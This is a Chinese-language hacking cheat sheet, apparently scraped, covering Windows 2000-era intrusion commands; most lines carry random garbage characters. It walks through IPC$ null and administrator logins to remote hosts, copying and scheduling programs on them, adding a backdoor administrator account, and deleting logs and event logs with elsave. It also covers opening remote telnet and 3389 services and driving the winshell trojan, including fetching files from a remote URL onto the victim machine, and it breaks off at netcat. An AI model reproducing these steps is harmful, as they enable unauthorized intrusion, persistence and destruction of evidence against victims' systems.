网管和黑客都必须知道的命令
h;RKF\U:" 常用的几条NET命令:
UPr8Q^wm .CAcG"42 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
%{j)w{
LJ '>aj5tZ>R (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
vq_v;$9} cq,8^o& (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
<ZwmXD.VD Rct=vDU (查看远程主机时间) net time \\IP地址
zjlo3=FQX[ R;3T yn+ (定时启动某个程序) at \\IP地址 02:18 readme.exe
c)Ep<W<r1 .KX LWH (查看共享) net view \\IP地址
;z3w#fNMv tEC`->| (查看netbios工作组列表) nbtstat -A IP地址
]*\m@lWu p J#<e (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
3A)Ec/;~ ]R7zvcu& (这两条把自己增加到管理员组): net user 用户名 密码 /add
t9Y?0O}/ Ip&Q'"HYj net localgroup Administrators 用户名 /add
lr-:o@q{ /2jw]ekQ' (断开连接) net use \\IP地址\ipc$ /delete
\66j4?H# 0<4Swj3s7 扫尾:
m!H7;S-( #>[5NQ;$' del C:\winnt\system32\logfiles\*.*
!tckE\ h#N 1XD|H_JG<j del C:\winnt\ssytem32\config\*.evt
TxDzGC g0M9v]c
del C:\winnt\system32\dtclog\*.*
5IfyD ]< tI;pdR] del C:\winnt\system32\*.log
|`c=`xK7' n>##,o|Vr# del C:\winnt\system32\*.txt
NUjo5.7 %$3)xtS6 del C:\winnt\*.txt
se, 0Rvkt ^a?H" del C:\winnt\*.log
*5Aq\g,n DAHQ7#qfQC 一、netsvc.exe
Q?7:XbN 6d%'>^`(o- 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
LI/;`Y= 7$HN5T\! netsvc /list \\IP地址
0{'%j~" w=K!U] netsvc schedule \\IP地址 /query
cPL]WI0( d%C:%d netsvc \\IP地址 schedule /start
Ad'b{C% RbA.%~jjx* 二、OpenTelnet.exe
SeX:A)*ez% gyx4= 'Q 远程启动主机的Telnet服务,并绑定端口到7878,例如:
tM&;b?bJ[ @b,&b6V OpenTelnet \\IP地址 用户名 密码 1 7878
wNt-mgir-Q CTOrBl$70 然后就可以telnet到主机的7878端口,进入DOS方式下:
U2@Mxw ocbNf'W; telnet IP地址 7878
N-9qNLSP @*}?4wU^k 三、winshell.exe
zJCm0HLJ f:6%DT~a&C 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
5J 0Sc b( qO fek p Path (查看winshell主程序的路径信息)
]%8f-_fSy ;;cPt44s b reBoot (重新启动机器)
qZ79IX'y bo%v( d shutDown (关闭机器)
oY$L "2FI3M= s Shell (执行后你就会看到可爱的“C:\>”)
QTKN6P \'AS@L"Wj^ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
Z/hk)GI R]8^
@i1 CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
$k=5nJ SF#Rc>v 四、3389登陆器,GUI方式登录远程主机的
IX]K"hT +CF"Bm8@ 五、elsave.exe
-'jPue2\ WI+ 5x 事件日志清除工具
h~zG*B5F ""2g{!~r elsave -s \\IP地址 -l "application" -C
MlBw=Nr hExw} c elsave -s \\IP地址 -l "system" -C
<GthJr>1D 5f'<0D;K elsave -s \\IP地址 -l "security" -C
$F,&7{^ Edi`x5"l 执行后成功清除应用程序日志,系统日志,安全日志
G>q16nS~KP FID4@-- 六、hbulot.exe
J|D$ Y3J;Kk#AH 开启win2kserver和winxp的3389服务
O*d4zBT
9*lkx# hbulot [/r]
6-w'? G37 ZO ! 使用/r表示安装完成后自动重起目标使设置生效。
<m|\#Jw_V |y*-)t 七、nc.exe(netcat.exe)
kQY+D1 &